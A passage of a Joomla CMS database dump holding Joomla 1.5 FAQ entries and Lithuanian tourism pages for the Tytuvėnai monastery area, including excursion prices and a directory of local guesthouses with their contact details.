apiplėštas, naikintas ir niokotas Tytuvėnų bernardinų vienuolynas laukia restauravimo ir atnaujino, nes tai bernardiniškos vienuolynų dvasinės, istorinės ir meninės kultūros paveldas. Laukia atgimimo ir naujo šviesesnio istorijos puslapio.</p>','',1,0,0,51,'2011-04-14 05:54:15',135,'','2011-10-31 11:43:49',135,0,'0000-00-00 00:00:00','2011-04-14 05:54:15','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',8,0,7,'','',1,193,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(160,244,'Where did the Installers go?','where-did-the-installer-go','','The improved Installer can be found under the Extensions Menu. With versions prior to Joomla! 1.5 you needed to select a specific Extension type when you wanted to install it and use the Installer associated with it, with Joomla! 1.5 you just select the Extension you want to upload, and click on install. The Installer will do all the hard work for you.','',-2,0,0,51,'2008-08-10 23:16:20',135,'','2008-08-10 23:16:20',135,0,'0000-00-00 00:00:00','2006-10-10 04:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,0,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(161,245,'Where did the Mambots go?','where-did-the-mambots-go','','<p>Mambots have been renamed as Plugins. </p><p>Mambots were introduced in Mambo and offered possibilities to add plug-in logic to your site mainly for the purpose of manipulating content. In Joomla! 1.5, Plugins will now have much broader capabilities than Mambots. Plugins are able to extend functionality at the framework layer as well.</p>','',-2,0,0,51,'2008-08-11 09:17:00',135,'','2008-08-11 09:17:00',135,0,'0000-00-00 00:00:00','2006-10-10 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,0,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(162,246,'How do I localise Joomla! to my language?','how-do-i-localise-joomla-to-my-language','','<h4>General<br /></h4><p>In Joomla! 1.5 all User interfaces can be localised. This includes the installation, the Back-end Control Panel and the Front-end Site.</p><p>The core release of Joomla! 1.5 is shipped with multiple language choices in the installation but, other than English (the default), languages for the Site and Administration interfaces need to be added after installation. Links to such language packs exist below.</p>','<p>Translation Teams for Joomla! 1.5 may have also released fully localised installation packages where site, administrator and sample data are in the local language. These localised releases can be found in the specific team projects on the <a href=\"http://extensions.joomla.org/component/option,com_mtree/task,listcats/cat_id,1837/Itemid,35/\" target=\"_blank\" title=\"JED\">Joomla! Extensions Directory</a>.</p><h4>How do I install language packs?</h4><ul><li>First download both the admin and the site language packs that you require.</li><li>Install each pack separately using the Extensions-&gt;Install/Uninstall Menu selection and then the package file upload facility.</li><li>Go to the Language Manager and be sure to select Site or Admin in the sub-menu. Then select the appropriate language and make it the default one using the Toolbar button.</li></ul><h4>How do I select languages?</h4><ul><li>Default languages can be independently set for Site and for Administrator</li><li>In addition, users can define their preferred language for each Site and Administrator. This takes affect after logging in.</li><li>While logging in to the Administrator Back-end, a language can also be selected for the particular session.</li></ul><h4>Where can I find Language Packs and Localised Releases?</h4><p><em>Please note that Joomla! 1.5 is new and language packs for this version may have not been released at this time.</em> </p><ul><li><a href=\"http://joomlacode.org/gf/project/jtranslation/\" target=\"_blank\" title=\"Accredited Translations\">The Joomla! Accredited Translations Project</a>  - This is a joint repository for language packs that were developed by teams that are members of the Joomla! Translations Working Group.</li><li><a href=\"http://extensions.joomla.org/component/option,com_mtree/task,listcats/cat_id,1837/Itemid,35/\" target=\"_blank\" title=\"Translations\">The Joomla! Extensions Site - Translations</a>  </li><li><a href=\"http://community.joomla.org/translations.html\" target=\"_blank\" title=\"Translation Work Group Teams\">List of Translation Teams and Translation Partner Sites for Joomla! 1.5</a> </li></ul>',-2,0,0,52,'2008-07-30 14:06:37',135,'','2008-07-30 14:06:37',135,0,'0000-00-00 00:00:00','2006-09-29 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',9,0,0,'','',1,10,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(163,247,'Ekskursijos','ekskursijos','','<p> </p>\n<p>Siūlome maloniai praleisti laiką Tytuvėnų miestelyje ir jo apylinkėse, kur galima pasimėgauti miškų ošimu, ežerų gaiva ir nuostabia aplinka. O norinčius istorinių kultūrinių žinių kviečiame į Tytuvėnų Bernardinų vienuolyno ansamblį.<br />Vienuolyno komplekse praleisti laiką gali įvairaus amžiaus piligrimai, keliautojai, turistai. Lankytojus sudomins išsami Tytuvėnų Bernardinų vienuolyno istorija ir didingų vargonų koncertas.<br /><br />VšĮ „Tytuvėnų piligrimų centras“ siūlo šias paslaugas:</p>\n<ul>\n<li>ekskursijas po Tytuvėnų miestelį,</li>\n<li>ekskursijas po Tytuvėnų Bernardinų vienuolyną,</li>\n<li>ekskursijas po Kelmės rajono lankomus objektus,</li>\n<li>individualių maršrutų sudarymą,</li>\n<li>biuro paslaugas.</li>\n</ul>\n<p><br />Lankytojai aptarnaujami nuo pirmadienio iki penktadienio   8:00 – 17:00 valandomis.<br />Šeštadieniais, sekmadieniais ir po darbo valandų Tytuvėnų Bernardinų vienuolynas lankomas pagal susitarimą. Siekiant užtikrinti gerą mūsų paslaugų kokybę, ekskursijas rekomenduojame užsisakyti iš anksto. Skambinkite telefonu 8 678 77676.</p>\n<p><strong>Kviečiame atvykti su savo grupe susikaupimo dienoms, rekolekcijoms, seminarams.</strong></p>\n<p><br />Tytuvėnų piligrimų centro lankytojams teikiamų paslaugų įkainiai:</p>\n<ul>\n<li>Viso ansamblio lankymas vieno bilieto kaina suaugusiam – 6 Lt. </li>\n<li>Viso ansamblio lankymas vieno bilieto kaina vaikui – 3 Lt.</li>\n<li>Vienuolyno lankymas -vieno bilieto kaina suaugusiam – 3 Lt.</li>\n<li>Vienuolyno lankymas -vieno bilieto kaina vaikui – 1,5 Lt.</li>\n<li>Išplėstinė edukacinė programa asmeniui – 30 Lt.</li>\n<li>Pusė išplėstinės edukacinės programos asmeniui – 15 Lt.</li>\n<li>Ekskursijų dalyvių vaišinimas arbata asmeniui – 3 Lt.</li>\n<li>Fotosesijos (vestuvių ir kt.progomis) vienuolyne ir vienuolyno kiemelyje mokestis – 50 Lt.</li>\n<li>Gido paslaugos: <br /> grupei iki 20 asmenų – 30 Lt,<br /> grupei iki 50 asmenų – 50 Lt,<br /> ekskursija užsienio kalba – 100 Lt,<br /> apžvalginės ekskursijos trukmė – viena valanda.</li>\n</ul>\n<p>Pensininkams ir neįgaliems asmenims bilietui taikoma 50 % nuolaida.<br />Lietuvos Respublikos muziejininkai, Tarptautinės muziejų tarybos (ICOM) nariai muziejų lanko nemokamai.<br />Asmenys, kuriems taikytinos nuolaidos, prieš pirkdami bilietą privalo pateikti nuolaidas suteikiantį pažymėjimą.<br />Pamaldų metu ekskursijos bažnyčioje nevedamos.<br />Ansamblio teritorijoje renginių ir ekskursijų metu nerūkoma, nevartojami svaigieji gėrimai, netriukšmaujama, nešiukšlinama, nesinaudojama mobiliaisiais telefonais, nefotografuojama su blykstėmis neleistinose vietose, nefilmuojama be leidimo.</p>\n<p>Ekskursijas veda 1 kategorijos gidė Rūta Krencienė.<br />Visais klausimais dėl ekskursijų prašome kreiptis telefonu 8 678 77676, el. p. ruta@tytuvenai.eu</p>','',-2,0,0,52,'2011-04-14 10:34:17',135,'','2012-12-12 14:39:29',135,0,'0000-00-00 00:00:00','2011-04-14 10:34:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',16,0,0,'','',1,2318,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(164,248,'Apgyvendinimas','kur-apsistoti','','<p style=\"text-align: justify;\"><strong style=\"font-size: 12.16px;\">Mažasis dvaras</strong></p>\r\n<p>„Mažasis dvaras\" atveria duris svečiams norintiems pasimėgauti prabanga ir paminėti įvairias progas. Ši nuostabi vieta įsikūrusi Kelmės mieste, šalia istorinės Kelmės dvaro sodybos. Vieta tinka įvairioms šventėms, vestuvėms, krikštynoms, jubiliejams, susitikimams, įvairioms konferencijoms, seminarams, mokymams ir pan. organizuoti. „Mažasis dvaras\" talpina iki 250 žmonių. Čia teikiamos maitinimo bei apgyvendinimo paslaugos. „Mažajame dvare\" vienu metu gali apsigyventi iki 50 žmonių.</p>\r\n<p>Adresas:</p>\r\n<p>Dvaro  g. 13B, Kelmė</p>\r\n<p>Tel.: 8 603 73 763</p>\r\n<p>El. paštas: r.redamargiene@gmail.com</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p><strong>Užvenčio Dvaro Malūnas</strong></p>\r\n<p>Užvenčio vandens malūno ir spirito varyklos pastatas – vienas iš Užvenčio dvaro sodybos pastatų. Istoriniuose šaltiniuose minima, kad jau 1759 m. Užventyje veikė malūnas ant Ventos upės ir bravoras. Šiuo metu Užvenčio vandens malūnas prikeltas naujam gyvenimui. Malūne puikiai dera garbinga istorija ir komfortiška šiandiena. Atkurta senoji turbina gamina elektros energiją, restauruotos malūno salės laukia pokylio svečių. Įrengtas sveikatingumo kompleksas su baseinu, pirtimi ir treniruoklių sale. Taip pat viešbutis bei konferencijų salė. Šiandien malūnas ypač mėgiamas ir meno žmonių. Čia dažnai lankosi Lietuvos menininkai, vyksta parodos ir koncertai. Malūno aplinkoje atgaivą randa ne tik kūnas, bet ir siela.</p>\r\n<p>Adresas:</p>\r\n<p>Užventis, Kelmės r.</p>\r\n<p>Mob.: 8 682 14 007 (Alvydas), 8 682 14 008 (Milda)</p>\r\n<p>El. paštas uzvenciomalunas@gmail.com</p>\r\n<p>Interneto svetainė <a href=\"http://www.uzvenciomalunas.lt\">www.uzvenciomalunas.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p><strong>Poilsiavietė „Sedula“</strong></p>\r\n<p>Poilsiavietė “Sedula”, įsikūrusi ant Bridvaišio ežero kranto Skogalio kaime, Tytuvėnų apylinkių seniūnijoje, Kelmės rajone ir užima 4,7 ha žemės sklypą. Iš paukščio skrydžio ši poilsiavietė yra patogioje geografinėje vietovėje – 20 km nuo pagrindinio kelio Kaliningradas – Ryga, Tytuvėnų regioniniame parke. Šalia – žymusis Šiluvos miestelis. Atvykus į poilsiavietę svečius kviečiame užsukti į pagrindinį pastatą - čia Jūs gausite visą reikalingą informaciją. Šiame pastate taip pat yra administracija, veikia 100 vietų restoranas, 22 vietų banketų salė, 23 vietų viešbutis, 70 vietų konferencijų salė. Poilsiavietėje veikia 5 žiemos tipo penkiaviečiai rąstiniai poilsio nameliai, naujai pastatyta 12 keturviečių rąstinių poilsio namelių - 73 vietos su pilnu servisu, 5 vasaros tipo nameliai - 30 vietų, 4 nauji vasaros tipo nameliai po 5 vietas viso 20 vietų, viso miegamų vietų - 145, pirtis ant ežero kranto, paplūdimys, žaidimų aikštelės, kempingas (vanduo, elektra, WC). Sezono metu veikia 35 m. ilgio vandens čiuožykla, yra tramplynas, galima plaukioti valtimis, vandens dviračiais. Sporto aikštyne nuolat lankosi aktyvaus laisvalaikio mėgėjai. Klientų patogumui išnuomojame visą poilsiavietę kuri talpina apie 1000 klientų. Nuostabi gamta, sutvarkyta aplinka, ramybė, maloniai nuteikia poilsiautojus. Gerai ruošiamas maistas tenkina bet kurio lankytojo norus. Poilsiavietę aplankė daug žymių respublikos veikėjų, svečių iš užsienio.</p>\r\n<p>Adresas:</p>\r\n<p>Skogalio k., Tytuvėnai, Kelmės r.</p>\r\n<p>Tel. 8 682 46498</p>\r\n<p>El. paštas vadybininkas.sedula@gmail.com</p>\r\n<p>Interneto svetainė <a href=\"http://www.sedula.lt\">www.sedula.lt</a></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: large;\"><strong style=\"font-size: 12.16px;\"><br /><span style=\"font-size: medium;\">Kaimo turizmo sodyba \"Dūksta\"</span></strong></span></p>\r\n<p style=\"text-align: justify;\">Sodyba yra įsikūrusi Kurtuvėnų regioniniame parke, netoli skaidraus Dūkstos ežero. Jums siūlome kubilą, pavėsinę, sporto aikštyną, žvejybą. Papildomai teikiama dekoravimo ir maitinimo paslaugas.</p>\r\n<p style=\"text-align: justify;\">Maloniai kviečiame atšvęsti šventes pokylių salėje ar pailsėti ramioje aplinkoje.</p>\r\n<p style=\"text-align: justify;\">Adresas: Mančių kaimas-3, Kelmės raj. Kukečių sen.</p>\r\n<p style=\"text-align: justify;\">Mob: +37067148307; +37067226321</p>\r\n<p style=\"text-align: justify;\">Internetinė svetainė: <a href=\"http://www.duksta.lt\">www.duksta.lt</a></p>\r\n<p style=\"text-align: justify;\">Fb: https://www.facebook.com/Sodyba-D%C5%ABksta-663072397073155/</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>„Gorainių dvaro sodyba“</strong></p>\r\n<p style=\"text-align: justify;\">Jauki „Gorainių Dvaro sodyba“ įsikūrusi Kražių seniūnijoje, Gorainių kaime. Ošiantys medžiai, čiurlenantis upelio vanduo leis pamiršti visus kasdienius rūpesčius ir mėgautis ramybe. Visus metus Jūsų laukia jauki pirtelė su visais patogumais prie pat tvenkinio, ant aukšto kalno, skirta mėgstantiems ramų poilsį su šeima ar draugais.</p>\r\n<p style=\"text-align: justify;\">Banketinė salė iki 50 žmonių. Kuri puikiai tiks Jūsų pasirinktai didesnei šventei. Pirtelėje galite švęsti mažesnes šeimos šventes, prie stalo susėda 20 žmonių. Iš viso turime 50 miegamų vietų. Sūpuoklės, batutas vaikams, kubilas, lauko terasos. Kalno papėdėje esantis Kražantės upelis leis Jums gėrėtis nuostabiais vaizdais. Mėgstantiems žvejoti – žuvis iš mūsų tvenkinio.</p>\r\n<p style=\"text-align: justify;\">Tai puiki vieta poilsiui ir vasarą, ir žiemą. Privatumas garantuojamas. Praleisite ramų laiką gamtoje, su knyga, pasivaikščiodami basomis po žolę.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Gorainių k. 2, Kražių sen., Kelmės r.</p>\r\n<p style=\"text-align: justify;\"> Tel. 8 648 48333</p>\r\n<p style=\"text-align: justify;\"> Svetainė <a href=\"http://www.gorainiudvaras.lt\">www.gorainiudvaras.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Tytuvos upelio Krantinė“</strong></p>\r\n<p style=\"text-align: justify;\"> „Tytuvos upelio Krantinė“ gali Jums pasiūlyti:</p>\r\n<p style=\"text-align: justify;\">naujas gražias erdves viduje ir lauke; dvi pobūvių sales, kuriose telpa iki 30 ir iki 60 žmonių;</p>\r\n<p style=\"text-align: justify;\">daug gardaus ir gražiai patiekiamo maisto; nakvynę svečiams.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Pievų g. 38, Tytuvėnai, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 640 35144, 8 606 14689</p>\r\n<p style=\"text-align: justify;\">Facebook\'o paskyra: Tytuvos upelio Krantinė</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Vėžežeris“</strong></p>\r\n<p style=\"text-align: justify;\">Poilsiavietė „Vėžežeris“ randasi 30 km nuo Šiaulių, Vėžežero k., Šaukėnų sen., Kelmės rajone. Mūsų tikslas - suteikti kuo patogesnį ir malonesnį poilsį Jums šiltuoju ir šaltuoju metų laiku. Aplink poilsiavietę nuostabus, gražus miškas - tikras poilsis gamtoje!</p>\r\n<p style=\"text-align: justify;\">Teritorijoje turime septynis poilsio namelius, kuriuose gali gyventi po 5 žmones. Nameliuose yra virtuvės, poilsio ir miegamojo zonos.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Vėžežerio kaimas, Šaukėnų seniūnija, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. (8-687) 20984</p>\r\n<p style=\"text-align: justify;\">El. paštas: info@vezezeris.lt</p>\r\n<p style=\"text-align: justify;\">Svetainė: <a href=\"http://www.vezezeris.lt\">www.vezezeris.lt</a></p>\r\n<p style=\"text-align: justify;\"><br /><strong>Kaimo turizmo sodyba \"Dranginė\"</strong></p>\r\n<p style=\"text-align: justify;\">Sodyba Dranginė įsikūrusi 2 km nuo Kelmės, kviečia norinčius atšvęsti savo šventes.</p>\r\n<p style=\"text-align: justify;\">Siūlome Jums p<span style=\"font-size: 12.16px;\">okylių salę, talpinančią iki 35 žmonių; p</span><span style=\"font-size: 12.16px;\">irtį su dušu; m</span><span style=\"font-size: 12.16px;\">iegamas vietas, p</span><span style=\"font-size: 12.16px;\">avėsinę, š</span><span style=\"font-size: 12.16px;\">ašlykinę.</span></p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Verpena, Kelmės rajonas</p>\r\n<p style=\"text-align: justify;\">Tel.: +370 618 29956</p>\r\n<p style=\"text-align: justify;\">El. paštas: giedreera@gmail.com</p>\r\n<p style=\"text-align: justify;\"><br /><strong>Kaimo turizmo sodyba \"Nendrė\"</strong></p>\r\n<p style=\"text-align: justify;\">Kviečiame į puikią sodybą „Nendrė“ ant Giliaus ežero kranto Tytuvėnuose. Puiki geografinė padėtis: 40 km nuo Šiaulių, apie 100 km nuo Kauno ir Panevėžio. Puikiai tinka ramiam poilsiui, draugų ar šeimos rate. Čia galėsite pasimėgauti natūralia gamta ir pažvejoti, paplaukioti burlente ar irklente, pairkluoti valtimi, išbandyti vandens sklandytuvo greitį, pasivažinėti dviračiu arba pasivaikščioti tam skirtais takais, pasideginti šalia esančiame paplūdimyje, paklausyti paukštelių čiulbėjimo ar tiesiog pailsėti nuo kasdieninių rūpesčių. Sodybos teritorija apsupta miškų, o pro namelio langą atsiveria ežero panorama. Lauke įrengta pavėsinė su židiniu, yra atskiras lauko pečius ant kurio puikiai išsivirsite sriubą ar plovą. Sodyboje 12 įrengta miegojimo vietų, tačiau galime sutalpinti ir daugiau.</p>\r\n<p style=\"text-align: justify;\">Užsukite į mūsų facebook puslapį ir sužinokite daugiau:</p>\r\n<p style=\"text-align: justify;\">https://www.facebook.com/SodybaNendreref=hl</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Maironio g. 51, Tytuvėnai, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8-627 87216</p>\r\n<p style=\"text-align: justify;\"><strong style=\"font-size: 12.16px;\"><br /><br /><span style=\"font-size: medium;\">Jurtos</span></strong></p>\r\n<p style=\"text-align: justify;\">Pasiilgus neįprastos nakvynės,  gaivaus  ežero vandens – sunešto šaltinių , gryno pušyno oro, žavingo kraštovaizdžio, kviečiame atvykti į poilsiavietę prie Medinio ežero. Jurtas pagaminti ir pastatyti padėjo tokių statinių meistras iš Judrėnų kaimo, Klaipėdos rajone - Antanas Poška. Jo kalbų apie teigiamą vilnos poveikį  žmogui būtų galima klausytis ilgai. Dėl daugelio dalykų jis tikrai teisus. Tik patys apsilankę ir pernakvoję tokioje jurtoje, galėsitei tai patvirtinti ar paneigti. Jurtose galima apsistoti ir žiemos metu. Kiekvienoje  jų rasite ne tik šiuolaikiškai ir moderniai įrengtas 40 m2 metrų gyvenamąsias patalpas bet ir jaukų židinį , kuris suteiks šilumos  bet kokiu oru. Nakvynei galite rinktis vieną iš penkių jaukiai įrengtų jurtų .Čia rasite visus geram  poilsiui reikalingus patogumus . Atvykę į poilsiavietę Galėsite pažvejoti , išsimaudyti pirtyje, pažaisti  tinklinį ar ramiai pasėdėti prie laužo. Tai puiki vieta praleisti savo laisvalaikį, pailsėti su šeima, draugais, giminėmis.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Panūdžių kaimas, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 698 89135</p>\r\n<p style=\"text-align: justify;\">El. paštas kuzmum@gmail.com</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.yurtos.lt\">www.yurtos.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Indėniška stovyklavietė \"Laukiniai vakarai - Wild West\"</strong></p>\r\n<p style=\"text-align: justify;\">Lietuvos vidury, tarp Raseinių ir Kelmės, vaizdingame Dubysos upės pakrantės vingio slėnyje, apsuptame miškų, aukštų kalvų kuriasi indėniška turistinė stovyklavietė.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Kalniškių g. 3, Tytuvėnų sen. Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Facebook: wildwestlaukiniaivakarai <br />El. paštas: <a href=\"mailto:laukiniaivakaraiww@yahoo.com\">laukiniaivakaraiww@yahoo.com</a></p>\r\n<p style=\"text-align: justify;\">Telefonas: 8 623 74600</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Pakėvio dvaras</strong></p>\r\n<p style=\"text-align: justify;\">Vaiguvos seniūnijoje, Pakėvio kaime, 8 km į šiaurės vakarus nuo Kelmės yra Pakėvio dvaras. Pakėvio dvaras žinomas nuo XVII a. 1685 metais dvaras paminėtas Beržėnų valsčiaus aktuose. XIX a. Pakėvį išgarsino čia gimęs etnografas, tautosakininkas, literatūros istorikas Liudvikas Adomas Jucevičius (1813-1846), kuris pasirašinėjo Liudwik z Pokiewia slapyvardžiu.</p>\r\n<p style=\"text-align: justify;\">Dvaro teritorija užima 38 ha plotą. Tai rami ir nuošali vieta, unikali nuostabiu erdvės ir vaizdingo kraštovaizdžio deriniu. Nuostabi gamta, naujai apsodinta aplinka maloniai nuteikia atvykusius. Restauruotuose pastatuose yra pobūvių salės, kur galima patogiai rengti vestuves, konferencijas, įmonių vakarėlius taip pat jubiliejus, gimtadienius ar jaukius pasisėdėjimus mažoje kompanijoje. Tvenkiniuose, kurie supa dvarą iš šiaurės rytų ir pietvakarių, gausu žuvies: upėtakių, karpių, eršketų. Žvejams siūlome išbandyti sėkmę žvejyboje.</p>\r\n<p style=\"text-align: justify;\">Klientų patogumui išnuomojame 100-os vietų seklyčios pastatą. Yra 12 miegamų vietų. Automobilių stovėjimo aikštelės, stebimos vaizdo kameromis.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Dvaro g. 54, Pakėvio k., Vaiguvos sen., LT - 86414 Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Tel. (8 427) 61088</p>\r\n<p style=\"text-align: justify;\">El. paštas pkd@pakeviodvaras.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.pakeviodvaras.lt\">www.pakeviodvaras.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Raganynė“</strong></p>\r\n<p style=\"text-align: justify;\">Jauki, saugi ir puikiai paruošta „Raganynės sodyba“, 25 km nuo Kelmės, 42 km  nuo Šiaulių, 33 km nuo Radviliškio, pakeliui į Tytuvėnus ir Raseinius.</p>\r\n<p style=\"text-align: justify;\">Jūsų  laukia  jauki  aplinka tiek viduje, tiek aplink sodybą: virtuvėlė, pokylių salė iki 55 žmonių, rusiška pirtis su dviem persirengimo kambariais, dušinė, terasa su baldais; II aukšte 5 kambariai su 40 miegamųjų vietų, 1 kambarys ypatingoms progoms, balkonas, pavėsinė, 1 ha tvenkinys su maudymosi pakrante. Sodyba sutvarkyta, privati, uždara; veikia visus metus; visa 14 ha teritorija aptverta ir saugi.</p>\r\n<p style=\"text-align: justify;\">Įžuvintame 1 ha tvenkinyje auga karpiai, lynai, lydekos, amūrai, plačiakakčiai, ešeriai, šamai, kurių svoris nuo 1,5 kg. iki 19,5 kg. Vykdoma komercinė žvejyba.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Aukštiškių kaimas 5, Tytuvėnų apl.sen., Kelmės rajonas</p>\r\n<p style=\"text-align: justify;\">Mob. 8 614 90851</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.raganyne.lt\">www.raganyne.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Tytuvėnų papartis“</strong></p>\r\n<p style=\"text-align: justify;\">Sodyba „Tytuvėnų papartis“ įsikūrusi Tytuvėnų regioniniame parke ant Giliaus ežero kranto. Šalia sodybos yra Giliaus ežero takas, kuris driekiasi aplink ežerą. einant šiuo taku galėsite aplankyti daugybę įrengtų maudyklų, stebėti paukščius nuo apžvalgos bokštelio, gerti šaltinio vandenį. Šalia sodybos esančiame Giliaus ežere galėsite pasiplaukioti valtimis, baidarėmis bei pažvejoti. Taip pat galėsite pavakaroti prie laužo sodybos kieme Sodybos banketinėje salėje rengiamos vestuvės, krikštynos, gimtadieniai, giminių susitikimai, sąskrydžiai, konferencijos bei seminarai. Talpinama iki 70 žmonių, taip pat sodyboje galima apnakvyndinti iki 50 svečių. Bendradarbiaujame su partneriais, kurie organizuoja maitinimą ir patalpų dekoravimą. Padedame išsirinkti bei pristatome šventinius tortus. Pasiūlome renginių vedėjus bei muzikantus.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Miško g. 9, Tytuvėnai, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 650 81860</p>\r\n<p style=\"text-align: justify;\">El. paštas tytuvenupapartis@gmail.com</p>\r\n<p 